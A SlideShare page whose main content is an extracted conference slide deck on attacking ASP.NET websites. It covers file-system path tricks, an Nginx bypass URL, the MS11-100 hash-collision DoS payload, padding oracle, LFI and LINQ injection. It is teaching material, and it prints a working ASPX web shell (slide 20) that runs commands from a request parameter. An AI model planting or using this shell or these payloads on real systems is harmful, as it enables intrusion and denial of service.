Как разработать защищенное веб-приложение и не сойти при этом с ума? (PHDays 3)Как разработать защищенное веб-приложение и не сойти при этом с ума? (PHDays 3)
Как разработать защищенное веб-приложение и не сойти при этом с ума? (PHDays 3)Vladimir Kochetkov
 

More from Vladimir Kochetkov (15)

Практическое использование средств криптографии в .NET, Java и PHP
Практическое использование средств криптографии в .NET, Java и PHPПрактическое использование средств криптографии в .NET, Java и PHP
Практическое использование средств криптографии в .NET, Java и PHP
 
Do WAFs dream of static analyzers
Do WAFs dream of static analyzersDo WAFs dream of static analyzers
Do WAFs dream of static analyzers
 
AppSec -- хакерский путь
AppSec -- хакерский путьAppSec -- хакерский путь
AppSec -- хакерский путь
 
Подводные камни прикладной криптографии, I
Подводные камни прикладной криптографии, IПодводные камни прикладной криптографии, I
Подводные камни прикладной криптографии, I
 
Философия Application Security
Философия Application SecurityФилософия Application Security
Философия Application Security
 
Современные подходы к SAST
Современные подходы к SASTСовременные подходы к SAST
Современные подходы к SAST
 
Подводные камни System.Security.Cryptography
Подводные камни System.Security.CryptographyПодводные камни System.Security.Cryptography
Подводные камни System.Security.Cryptography
 
Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!
 
Прикладная теория Application Security
Прикладная теория Application SecurityПрикладная теория Application Security
Прикладная теория Application Security
 
Automated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source CodeAutomated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source Code
 
Исключительно простая теория AppSec .NET
Исключительно простая теория AppSec .NETИсключительно простая теория AppSec .NET
Исключительно простая теория AppSec .NET
 
Автоматическая генерация патчей для уязвимого исходного кода
Автоматическая генерация патчей для уязвимого исходного кодаАвтоматическая генерация патчей для уязвимого исходного кода
Автоматическая генерация патчей для уязвимого исходного кода
 
How to Develop a Secure Web Application and Stay in Mind? (PHDays 3)
How to Develop a Secure Web Application and Stay in Mind? (PHDays 3)How to Develop a Secure Web Application and Stay in Mind? (PHDays 3)
How to Develop a Secure Web Application and Stay in Mind? (PHDays 3)
 
Как разработать защищенное веб-приложение и не сойти при этом с ума (вебинар)
Как разработать защищенное веб-приложение и не сойти при этом с ума (вебинар)Как разработать защищенное веб-приложение и не сойти при этом с ума (вебинар)
Как разработать защищенное веб-приложение и не сойти при этом с ума (вебинар)
 
Как разработать защищенное веб-приложение и не сойти при этом с ума? (PHDays 3)
Как разработать защищенное веб-приложение и не сойти при этом с ума? (PHDays 3)Как разработать защищенное веб-приложение и не сойти при этом с ума? (PHDays 3)
Как разработать защищенное веб-приложение и не сойти при этом с ума? (PHDays 3)
 

Recently uploaded

MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfOverkill Security
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 

Recently uploaded (20)

MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 

Hack an ASP .NET website? Hard, but possible!

  • 1. TO HACK AN ASP .NET WEBSITE? HARD, BUT POSSIBLE! Vladimir Kochetkov Positive Technologies
  • 2. A Blast From The Past: File System DOS devices and reserved names: NUL:, CON:, AUX:, PRN:, COM[1-9]:, LPT[1-9]: - the colon is optional, names can be used as part of the path Reserved characters: < > : " / | ? * Case insensitivity of names: Filename == FileName == filename == FILENAME Support for short names 8.3: LongFileName.Extension ~= LONGFI~1.EXT ~= LO0135~1.EXT Ending characters: Filename == Filename... == Filename
  • 3. A Blast From The Past: File System Named pipe and mailslots (CreateFile): Hostpipe<name> , Hostmailslot<name> Alternative syntax of relative paths: C:Windowsnotepad.exe == C:notepad.exe , if Windows is a current catalog of C: Substitutions (FindFirstFile): < == * , > == ? , " == . UNC and Unicode paths: C:WindowsSystem32 HostC$WindowsSystem32 .C:WindowsSystem32 ?C:WindowsSystem32 ?UNCHostC$WindowsSystem32
  • 4. A Blast From The Past: File System Meta attributes and NTFS alternative data streams: Directory:<Name>:<Type>File:<Name>:<Type> C:Windowshh.exe == C:Windows:$I30:$INDEX_ALLOCATIONhh.exe C:Windowsnotepad.exe == C:Windowsnotepad.exe::$DATA FileName.aspx == FileName.aspx:.jpg Files Meta Attributes Indices Meta Attributes $STANDARD_INFORMATION $INDEX_ROOT $FILE_NAME $INDEX_ALLOCATION $DATA $BITMAP $ATTRIBUTE_LIST $OBJECT_ID $REPARSE_POINT
  • 5. [PT-2012-06] Nginx Restrictions Bypass Severity level: Medium (5.0) (AV:N/AC:L/Au:N/C:P/I:N/A:N) Vulnerable versions: Nginx for Windows <= v1.3 Vector: Remote The flaw enables an intruder to forward HTTP requests to certain URL addresses, bypassing the rules set in the Location directives of the web server configuration. By exploiting the vulnerability, a potential hacker could gain access to the application source code and closed parts of the website, detect new vulnerabilities, steal passwords to the database or other services, etc. :$I30:$INDEX_ALLOCATION were processed as a part of the catalog name.
  • 6. [PT-2012-06] Nginx Restrictions Bypass http://hostname/.svn/entries http://hostname/.svn::$INDEX_ALLOCATION/entries HTTP/1.1 200 OK Server: nginx/1.2.0 HTTP/1.1 403 Forbidden Server: nginx/1.2.0 * A stable version of nginx-1.2.0 for Windows, released 2012-04-23 … location ~/.svn/ { deny all; } …
  • 8. Memory Corruption Interaction with native libraries, use of mix assemblies MS12-025, April 2012: - arbitrary code execution is triggered by exploitation of an integer overflow vulnerability in gdiplus.dll which causes heap corruption when calling the constructor of the System.Drawing.Imaging.EncoderParameter class. Insecure managed code unsafe void bufferOverflow(string s) { char* ptr = stackalloc char[10]; foreach (var c in s) { *ptr++ = c } }
  • 9. Turkish I And Other Peculiarities If two strings are compared with no regard to the current regional settings, the result might be quite unexpected: The English language: I & i The Turkish language: I & ı + İ & i <%@ Page Language="C#" Culture="Auto" %> <%@ Import Namespace="System.Globalization" %> <! DOCTYPE html> … <script runat="server"> … if (Session["mode"].ToLower() != "admin") … if (String.Compare(Request["path"]), 0, "FILE:", 0, 5, true) …
  • 10. Collision of Object Hashes System.Object.GetHashCode() returns a 32 bit hash code of an object (takes on values within the range from -2147483648 to 2147483647). (http://blogs.msdn.com/b/ericlippert/archive/2010/03/22/socks-birthdays-and-hash-collisions.aspx)
  • 11. Collision in ASP .NET (MS11-100) Standard situation: Unusual situation: 3QBZJK5ZX=&NEUQ7BWAV6=&6902D0YP6J=&9PZGHCDJYD=&NU73S3KNV=&IF686YJQJ8K=&9XUUCJEENJ=&F X4A75F91FM=&IGJKQVBZAVK=&LJVJV6J3UZ=&X7GJ5MWXY=&6AVIZWTVK=&WQNIQ7OZMS=&IM1VKMZHK6F=& DO9WX2R9H=&RYLZSIQT8V=&KR9BBFUH2E=&UI8N4SWVWW=&TL5F6URVPP=&B1P81FWDSVV=&CM6Y80XSAO=& LE72GBPWB=&EEFMULEXC=&M6FKM13WB=&MGN8123XA2K=&ZMI35GXHMN=&LXQQOM138LL=&XXST36DRX=&JR YRV54TFZ=&LGG3X9MFN7=&MH1NI402I22=&MHFIKIM0TEH=&BWPRVCQ4X3=&RM6K7V75WZ=&SMIAE6PAL4=& MOCGW14ZU7=&I0JKKKOG7EN=&Q4B9V7L3VZ=&23UAYU5B31=&9TRJE0XRWQ=&3Q3LKPC2K0=&D3ACY8973E= =&VGJPMCQHP=&AV6THWSCA7=&MH5SM8NPWB1=&P57KEP668X=&81C4LQ4DFY=&MPJBASYMRM=&25EWGNN5NE … over 4Mb form data … (https://github.com/HybrisDisaster/aspHashDoS)
  • 12. A Tricky Plan (Post-Mortem MS11-100) 1. Create 1000 collision strings for each combination ‘.NET version’/’hardware platform’ 2. Send each combination as POST request parameters 3. Measure the response time for each request 4. ??? 5. ;)
  • 15. ASP.NET Peculiarities Special catalogs and files: - App_Browser –browsers definition (*.browsers) - App_Code – a source code of helper classes and logics - App_Data – data stores - App_GlobalResources, App_LocalResources – application resources (*.resx, *.resources) - App_Themes – topics (*.skin, *.css, images, etc); - App_WebReferences – links to web services (*.wsdl, *.xsd, *.disco, *.discomap) - Bin – compiled builds used by the application - web.config, web.*.config – configuration files that determine settings of the web server and application
  • 16. ASP .NET Peculiarities Standard HTTP handlers: - WebResource.axd – access to the static resources embedded in the application assemblies. - ScriptResource.axd – access to JavaScripts embedded in the assemblies or stored on the disk. Usage: http://hostname/*Resource.axd?d=<resourceId>&t=<timestamp> Example: http://hostname/ScriptResource.axd?d=JuN78WBP_dBUR_BT9LH1wlP 8mXnNcENfktCX8YwH3sHG7wWwvn73TZaaChQhQtyzip3- kumGx1U67ntTt0sXKCn22VGvaQ3V4mXtCFgW9M1 where ‘d’ is an encrypted parameters: Q|~/Scripts/Script1.js,~/Scripts/Script2.js,~/Scripts/Script3.js|#|21c3 8a3a9b
  • 17. Padding Oracle (MS10-070) Consequences: – getting encryption/decryption keys:  authentication cookies  ViewState and Event Validation  Arguments for WebRecource.axd and ScriptResource.axd => Reading arbitrary files inside the application catalog Corrections:  Padding error returns a generic error message  A random number is used as IV  The format of encrypted strings is changed for their validation  ScriptResource.axd can handle only *.js files
  • 18. ASP .NET Features Standard HTTP handlers: - Trace.axd request tracing (available only in the debugging mode)
  • 19. Features of LFI exploitation Response.WriteFile(<vfilename>) - Allows including any file, except *.config, inside the application catalog - The file is included statically without code execution - Accepts virtual file name as an argument Server.Execute(<vfilename>) - Allows including any file, except for *.config, into the application catalog - Calls a handler for the sent file, includes the result into the response - Accepts virtual file name as an argument File.ReadAllText(<filename>) - Allows including any file if obtains enough privileges - The file is included statically without code execution - Accepts file name as an argument
  • 20. Minimum C# Shell <%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <%= Process.Start( new ProcessStartInfo( "cmd","/c " + Request["c"] ) { UseShellExecute = false, RedirectStandardOutput = true } ).StandardOutput.ReadToEnd() %>
  • 21. ViewState Meant to transfer data on view element to the server. - Is transferred in the __VIEWSTATE parameter - Encryption and integrity are not ensured in many cases - Is used by developers for session data storage on the client, though is not meant for this - Violation of its integrity can trigger exploitation of various threats from XXS to violation of application’s functionality.
  • 22. Request and Event Validations Request Validation is an embedded simple WAF aimed at preventing XSS. Blocks all requests that contain: &# < followed by a letter, !, / and ? Besides, it skips extraneous parameters started with с __ Event Validation is an embedded mechanism of event data validation. It is a __EVENTVALIDATION parameter that stores hashes of acceptable elements of of forms, events, ViewState, etc. Contrary to the common belief, it is insufficient against CSRF attacks as a standard implementation instance.
  • 23. Mass Assignment public class User { public int Id { get; set; } public string UserName { get; set; } public string Password { get; set; } public bool IsAdmin { get; set; } } public class UserController : Controller { IUserRepository _userRepository; public UserController(IUserRepository userRepository) { _userRepository = userRepository; } public ActionResult Edit(int id) { var user = _userRepository.GetUserById(id); return View(user); } [HttpPost] public ActionResult Edit(int id, FormCollection collection) { try { var user = _userRepository.GetUserById(id); UpdateModel(user); _userRepository.SaveUser(user); return RedirectToAction("Index"); } catch { return View(); } } } Model: Controller:
  • 25. LINQ Injection LINQ is a query language embedded into the syntax of the .NET languages. var result = from item in itemsList where item.field1 % 2 == 0 orderby item.field2 descending select new { item.field2, item.field3 }; var result = itemsList .Where(x => x.field1 % 2 == 0) .Select(x => new { x.field2, x.field3 }) .OrderByDescending(x => x.field2); Expression.Lambda<Predicate<int>>( Expression.Equal( Expression.Modulo( parameterN, Expression.Constant(2) ), Expression.Constant(0) ), parameterN);
  • 26. LINQ Injection Dynamic LINQ is one of a few libraries used to create dynamic run- time LINQ requests. Features: - Definition of expressions by strings; - Basic simple operations - Access to members of static and instant data types - Type instantiation and anonymous types construction What if "modifier" is formed out of input data and contains 0 OR 1 == 1 ? var modifier = "0"; var result = itemsList .Where("field1 % 2 == " + modifier) .Select(x => new { x.field2, x.field3 }) .OrderByDescending(x => x.field2);
  • 27. LINQ Injection Injection’s limitations in Dynamic LINQ: - Access to fields, properties and methods is available only for a collection type or for accessible types specified in the ‘white list’ - All expression parts must be executed without errors; error messages do not contain useful output - Injection is performable only for isolated parts of requests Injection’s possibilities in Dynamic LINQ: - Authentication / authorization bypass - Unauthorized access to the collection data - Abuse of functionality (provided that the collection objects have the statefull fields) - Conduction of DoS attacks (DoS). Remote Code Execution is actual in other solutions
  • 28. NorthWind DEMO public AjaxStoreResult GetCustomers(int limit, int start, string dir, string sort) { var query = (from c in this.DBContext.Customers select new { c.CustomerID, c.CompanyName, c.ContactName, c.Phone, c.Fax, c.Region }).OrderBy(string.Concat(sort, " ", dir)); int total = query.ToList().Count; query = query.Skip(start).Take(limit); return new AjaxStoreResult(query, total); }
  • 30. Thank You for Your Attention! Questions? vkohetkov@ptsecurity.ru twitter: @kochetkov_v